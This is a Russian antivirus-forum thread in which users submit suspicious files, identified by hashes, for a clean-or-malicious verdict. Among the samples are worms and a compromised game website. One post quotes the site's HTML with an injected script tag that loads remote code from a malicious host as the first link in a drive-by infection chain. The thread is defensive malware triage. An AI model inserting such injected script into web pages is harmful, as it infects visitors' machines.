Ответ на вопрос: Вирус или нет?

[vegas]

Результат загрузки
Файл сохранён как 090822_021854_Quarantine_4a8f1d4e1376f.zip
Размер файла 24123
MD5 8ca44af8b52815bd5dc1885e0968b897
Файл закачан, спасибо!

[AndreyKa]

vegas, C:\Program Files\Microsoft Common\svchost.exe - Worm.Win32.Bezopi.bj

[NickM]

файл запускается из темп папки,

Результат загрузки
Файл сохранён как 090823_165425_vir_4a913c017fbcb.zip
Размер файла 100015
MD5 6475a662a30a6671ddf9bfc34382113a

Файл закачан, спасибо!

[light59]

NickM, файл анализируется. Хотя я могу с уверенностью сказать, что он чистый. Так это от Realtek.

[SuperBrat]

Несколько недель этот файл пользователя не могу добавить в базу чистых AVZ. Опасного ничего не вижу.
Файл сохранён как 090825_113653_virus_4a9394954a6b2.zip
Размер файла 299068
MD5 ebfd612b376d71c6540ebcf430a3bb93

[Гриша]

Чистый...

[NickM]

Результат загрузки
Файл сохранён как 090825_181227_virus_4a93f14b415c8.zip
Размер файла 290940
MD5 826d9fb8b40d03aa4891b948da899bd0
Файл закачан, спасибо!

на вирустотал детект неоднозначный http://www.virustotal.com/analisis/7...316-1251208899

[kps]

NickM, install_winrout.bak проанализирован аналитиками ЛК, ответ: чистый.

[vistaorxpmoy]

Результат загрузки
Файл сохранён как 090826_121211_virus_4a94ee5b70b21.zip
Размер файла 2728392
MD5 9bfc1f12df97daf21972c80432ee57bf

Файл закачан, спасибо!

[NickM]

Результат загрузки
Файл сохранён как 090826_162139_virus_4a9528d3981ff.zip
Размер файла 74759
MD5 1bc3cf880222fec4571d4d3adeb3bfcc

Файл закачан, спасибо!

сидит в system32, после удаления восстанавливается

[Гриша]

vistaorxpmoy,

Secrun.exe- Net-Worm.Win32.Kolab.drb

NickM,

Файл безопасный...

[NickM]

Результат загрузки
Файл сохранён как 090827_162914_virus_4a967c1aea837.zip
Размер файла 165507
MD5 cb86a6cfc2d46b14788ce3b69781a2c3
Файл закачан, спасибо!

на вирустотал http://www.virustotal.com/analisis/4...01d-1251375784,

C:\WINDOWS\system32\REBUILDI.EXE
Активен, Ключ реестра, HKEY_USERS, S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOn ce, Rebuild Icon Cache

[Shalimov]

Новый зловред, уже второй день детектится только касперским - ей богу обидно!

Файл сохранён как 090827_164443_virus_4a967fbbb194b.zip
Размер файла 199839
MD5 3160bfe32e62ec9dc83092810cfa9e34

пароль на архив: virus

[Гриша]

Новый зловред, уже второй день детектится только касперским - ей богу обидно!

Тогда это форма бесполезна для вас

[valho]

Файл сохранён как 090828_074827_virus_4a97538b9273f.zip
Размер файла 656
MD5 b1216eca9b5de38286dae07b1c9e9249

[Гриша]

valho,

Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...

[valho]

valho,

Вы прислали текстовый файл, он не может быть опасен и обработке не подлежит...

Ну я его на сайте одном нашёл с таким скриптом

Код:

<script src=http://antipirat.cn/file/1.txt></script>

ну лана тогда...

[Kuzz]

Ну я его на сайте одном нашёл с таким скриптом

А там - ПДФка http://www.virustotal.com/ru/analisi...dd7-1251436654

[valho]

Код:

<html>
<head>
<title>по жанру - Старые Игры: бесплатно скачать флеш игры, компьютерные java игры, скачать psp игры, прохождение</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link href="/css/oldgames.css" rel="stylesheet" type="text/css">
</head>
<body><script src=http://antipirat.cn/file/1.txt></script>
<div class="header">
<div class="nav">
<a href="http://oldgames.ru/"><img src="/images/oldgames/home.gif" />главная</a>
<a href="/search/"><img src="/images/oldgames/search.gif" />поиск</a>
<noindex><a href="http://forum.oldgames.ru"><img src="/images/oldgames/forum.gif" />форум</a></noindex>
<a href="/feedback/"><img src="/images/oldgames/mail.gif" />обратная связь</a>
<a href="/map/"><img src="/images/oldgames/search.gif" />карта</a>
</div>

и т.д
Интересно, а чем он тогда может быть закодирован этот .txt?
Ведь туда кто то что то прописывает наверно, периодически

[Kuzz]

valho, ни чем он не закодирован.
Просто там еще один JS-скрипт, который ставит следующий и-фрейм.